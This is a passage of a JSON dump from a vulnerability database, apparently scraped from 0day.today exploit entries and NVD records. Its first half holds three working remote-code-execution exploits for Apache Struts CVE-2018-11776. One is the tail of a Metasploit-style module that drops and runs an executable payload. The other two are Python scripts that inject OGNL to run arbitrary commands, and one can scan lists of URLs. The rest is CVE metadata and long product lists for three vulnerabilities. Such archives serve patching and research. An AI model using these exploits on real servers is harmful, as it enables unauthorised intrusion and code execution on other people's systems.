'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": 
"2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. 
(Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = 
\"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be rendered later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = 
\"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform 
in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\"\r\n ognl_payload += \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s 
<host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-01T15:46:59", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-16T16:29:00", "type": "cve", "title": "CVE-2018-8014", "cwe": ["CWE-1188"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2023-11-07T03:01:00", "cpe": ["cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.8", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04", 
"cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:apache:tomcat:7.0.88", "cpe:/a:apache:tomcat:8.0.52", "cpe:/a:netapp:oncommand_insight:-", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:apache:tomcat:8.5.31", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:netapp:snapcenter_server:-"], "id": "CVE-2018-8014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:9.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.88:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-12-01T14:36:38", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same 
time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "cve", "title": "CVE-2018-11776", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-07T02:51:00", "cpe": ["cpe:/a:apache:struts:2.5.16", "cpe:/a:apache:struts:2.3.34"], "id": "CVE-2018-11776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.16:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-01T14:41:38", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. 
An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T20:29:00", "type": "cve", "title": "CVE-2018-1258", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T17:18:00", "cpe": ["cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2", "cpe:/a:oracle:retail_assortment_planning:14.1", "cpe:/a:oracle:retail_financial_integration:14.0", "cpe:/a:oracle:micros_lucas:2.9.5", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:oracle:retail_point-of-service:14.1", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:enterprise_repository:12.1.3.0.0", "cpe:/a:oracle:goldengate_for_big_data:12.3.2.1", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:insurance_policy_administration:10.0", "cpe:/a:oracle:retail_financial_integration:15.0", "cpe:/a:oracle:endeca_information_discovery_integrator:3.2.0", "cpe:/a:redhat:fuse:7.3.0", "cpe:/a:oracle:application_testing_suite:13.1.0.1", 
"cpe:/a:oracle:goldengate_for_big_data:12.2.0.1", "cpe:/a:oracle:application_testing_suite:10.1", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:hospitality_guest_access:4.2.1", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:retail_assortment_planning:16.0", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.2.8191", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:netapp:snapcenter:-", "cpe:/a:oracle:retail_point-of-service:14.0", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:endeca_information_discovery_integrator:3.1.0", "cpe:/a:oracle:retail_central_office:14.1", "cpe:/a:oracle:weblogic_server:10.3.6.0", "cpe:/a:oracle:retail_returns_management:14.0", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:retail_xstore_point_of_service:17.0", "cpe:/a:oracle:insurance_policy_administration:10.1", "cpe:/a:oracle:retail_financial_integration:16.0", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:oracle:weblogic_server:12.2.1.2", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:retail_back_office:14.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:peoplesoft_enterprise_fin_install:9.2", "cpe:/a:oracle:retail_financial_integration:13.2", "cpe:/a:oracle:big_data_discovery:1.6.0", "cpe:/a:oracle:retail_central_office:14.0", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:insurance_rules_palette:11.1", 
"cpe:/a:oracle:hospitality_guest_access:4.2.0", "cpe:/a:oracle:retail_assortment_planning:15.0", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:enterprise_repository:11.1.1.7.0", "cpe:/a:oracle:health_sciences_information_manager:3.0", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:weblogic_server:12.1.3.0", "cpe:/a:oracle:retail_back_office:14.0", "cpe:/a:oracle:retail_returns_management:14.1", "cpe:/a:oracle:retail_integration_bus:14.1.2", "cpe:/a:oracle:insurance_policy_administration:10.2", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:retail_financial_integration:14.1", "cpe:/a:oracle:goldengate_for_big_data:12.3.1.1", "cpe:/a:oracle:insurance_policy_administration:11.0", "cpe:/a:oracle:weblogic_server:12.2.1.3", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:agile_plm:9.3.6"], "id": "CVE-2018-1258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:goldengate_for_big_data:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_repository:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe:2.3:a:redhat:fuse:7.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.1.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:big_data_discovery:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.2.8191:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_repository:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:windows:*:*", 
"cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:micros_lucas:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", 